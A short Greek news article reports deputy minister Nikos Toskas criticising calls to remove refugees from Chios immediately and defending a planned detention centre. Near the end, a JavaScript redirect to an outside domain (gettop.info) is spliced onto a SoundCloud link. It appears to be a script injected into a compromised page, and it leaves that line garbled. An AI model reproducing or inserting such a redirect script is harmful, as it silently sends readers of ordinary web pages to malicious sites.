Τόσκας: Όσοι λένε να φύγουν τώρα οι πρόσφυγες από τη Χίο, δεν έχουν τη λύση

0
4

 

«Κάνουμε ό,τι μπορούμε, αλλά δε θα πρέπει κάποιοι να ξεγελιούνται και να νομίζουν ότι οι ακραίοι, που λένε να φύγουν τώρα οι πρόσφυγες από το νησί, προσφέρουν την έτοιμη, την εύκολη λύση για το Μεταναστευτικό» δήλωσε για τα πρόσφατα επεισόδια στη Χίο ο αναπληρωτής υπουργός Προστασίας του Πολίτη, Νίκος Τόσκας, μιλώντας στον ραδιοφωνικό σταθμό του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων, «Πρακτορείο 104,9 fm».

«Αυτοί που κομίζουν τέτοιες λύσεις, μόνο κακό στον τόπο μπορεί να προσφέρουν και όχι σωτηρία του τόπου. Είναι οι πρόχειρες λύσεις, οι επιπόλαιες και στις οποίες δε μπορεί να στηριχθεί κανένα σχέδιο για την επίλυση προβλήματος» είπε ο κ. Τόσκας και πρόσθεσε:
«Θέλει σχέδιο και εφαρμόζουμε σχέδιο, πλην όμως πρέπει να βοηθήσουν και κάποιοι από τις τοπικές κοινωνίες. Δε μπορεί ένα μέρος των ασχολούμενων με την Tοπική Aυτοδιοίκηση ή αν θέλετε και κάποιοι από τις εκκλησιαστικές Αρχές να δημιουργούν προβλήματα στη Χίο. Ένας ηγούμενος εκεί εφάρμοσε ασφαλιστικά μέτρα, για να μας σταματήσει κάποιο κέντρο κράτησης. Και αναρωτιέμαι χωρίς κέντρο κράτησης πού θα πάνε οι προβληματικοί, πού θα πάνε αυτοί που επιστρέφονται στην Τουρκία;

Δε δίνεται χώρος, προκειμένου να φύγουν μέσα από την πλατεία οι άνθρωποι και να πάνε λίγο πιο έκκεντρα και να μην υπάρχουν τα προβλήματα. Δε λύνονται έτσι τα προβλήματα. Πρέπει όλοι να συνεισφέρουν, ο χιώτικος λαός έχει βοηθήσει πάρα πολύ, ένας φιλόξενος λαός, δεν πρέπει αυτός ο λαός να αποπροσανατολιστεί και να πειστεί από κάποιους που δε θέλουν καμία λύση».

https://soundcloud.com/user-49494181/21-11a setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here